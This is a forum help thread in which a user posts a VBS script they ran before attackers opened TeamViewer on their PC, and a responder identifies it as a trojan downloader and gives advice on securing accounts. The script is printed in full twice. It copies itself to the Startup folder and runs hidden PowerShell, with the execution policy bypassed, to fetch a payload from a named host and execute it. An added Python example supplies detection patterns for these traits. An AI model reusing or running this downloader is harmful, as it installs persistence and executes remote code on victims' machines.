NotMikaa

What is this virus and how can I go about cleaning?


Hi!

So I came about this being dumb and installed it.
Didn't think anything of it at first until I noticed out of the corner of my eye that TeamViewer was opened and they were attempting to go into my Gmail.
They've already looked into my PayPal.

 

dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

 


A detection was added several days ago; the script is detected as the VBS/TrojanDownloader.Agent.SGV trojan. When the malware is detected, it should be cleaned without issues since it's a simple VB downloader script.

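A static triage check for scripts like the one posted in this thread, as an added example that is not part of any post and is not ESET's detection logic: it folds the `"powers" & "hell"` string splitting before matching the Startup-folder copy and the hidden download-and-execute PowerShell call. The rule names, function names and the abbreviated sample (with the placeholder host `example.invalid`) are constructed for illustration.

```python
import re

# Constructed, abbreviated sample modelled on the posted script; the host is a
# placeholder and "..." marks omitted text, so it is not a working downloader.
SAMPLE = r'''
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command ... New-Object System.Net.WebClient; ... OpenRead('htt" & "p://" & "example.invalid/placeholder.jpg'); ... IEX $results", 0, true
'''

# "powers" & "hell" style splitting: adjacent literals joined by & fold into one.
CONCAT = re.compile(r'"[ \t]*&[ \t]*"')

# Traits of the posted script; the rule names are this example's own.
RULES = {
    "startup_persistence": re.compile(
        r'specialfolders\s*\(\s*"startup"\s*\).*?copyfile\s+wscript\.scriptfullname',
        re.I | re.S),
    "hidden_powershell": re.compile(r'powershell\b[^\n]*-windowstyle\s+hidden', re.I),
    "policy_bypass": re.compile(r'-executionpolicy\s+bypass', re.I),
    "download_and_execute": re.compile(
        r'net\.webclient.*?https?://.*?\b(?:iex|invoke-expression)\b', re.I | re.S),
}

def fold_concatenation(vbs_source):
    """Join string literals split with & so keyword matching sees whole words."""
    return CONCAT.sub("", vbs_source)

def triage(vbs_source):
    """Return the sorted names of the rules that match the folded script text."""
    folded = fold_concatenation(vbs_source)
    return sorted(name for name, rule in RULES.items() if rule.search(folded))

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Without the folding step, the `hidden_powershell` and `download_and_execute` rules miss the sample, because neither `powershell` nor `http://` appears as a contiguous string in the raw file.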
On 12/1/2019 at 7:58 AM, NotMikaa said:

Hi!

So I came about this being dumb and installed it.
Didn't think anything of it at first until I noticed out of the corner of my eye that TeamViewer was opened and they were attempting to go into my Gmail.
They've already looked into my PayPal.

 


dim s15001
const CONSOLE_HIDE=0
const CONSOLE_SHOW=1
const CMD_WAIT=true
set oShell = wscript.createObject("WScript.Shell")
set sysOb = createobject("scripting.filesystemobject")
startup = oShell.specialfolders ("startup") & "\update.vbs"
sysOb.copyfile wscript.scriptfullname,startup ,true
oShell.run "cmd /c powers" & "hell " & "-ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('htt" & "p://" & "www.m9c.net/uploads/15744376681.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results", CONSOLE_HIDE, CMD_WAIT

 

You should secure your TeamViewer/AnyDesk or whatever your remote desktop software is.

Set a good password and limit access only to your PCs.

Because they have got access to several accounts of yours, you should change all passwords now, and secure them with 2-step verification for more secure entry to your accounts.

Edited by Rami
